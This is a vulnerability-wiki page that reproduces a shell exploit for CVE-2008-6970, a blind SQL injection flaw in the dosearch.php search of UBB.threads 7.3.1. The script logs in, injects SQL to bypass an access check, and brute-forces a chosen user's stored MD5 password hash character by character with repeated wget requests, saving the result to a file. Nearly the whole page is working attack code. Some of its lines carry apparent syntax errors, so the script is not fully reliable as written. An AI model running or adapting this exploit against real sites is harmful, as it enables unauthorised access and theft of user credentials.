免费、自由、人人可编辑的漏洞库
,
INFO
DESCRIPTION Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. FILE <pre> CVE-2008-6970.sh - Shell code program.
SOURCE
https://github.com/KyomaHooin/CVE-2008-6970
CVE-2008-6970.sh
#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#
hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
main='http://removed/ubbthreads/ubbthreads.php'
login='ubb=start_page&Loginname=removed&Loginpass=removed&firstlogin=1&from=http%3A%2F%2Fremoved%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
base="$main?ubb=dosearch&fromsearch=1&Words=body"
inject="&Forum=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"
hash=()
replace(){
echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}
push(){
echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}
brute(){
for char in ${hex*}; do
#replace string
inj=`replace "$inject" $char`
#inject
wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
#if match then return characters to hash array
if -z `cat ubb | grep "There are no results"` ; then
hash+=($char)
return
fi
rm ubb
done
}
# INIT
#get PHPSESSID cookie
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main
#blind SQL injection brute force attack
for ((i=0; i<32;i++)); do
brute
inject=`push "$inject" "R"`
done
#clean
rm cookies.txt
#print the hash
printf "%s" "${hash@}" >> hash.txt
pwnwiki.com
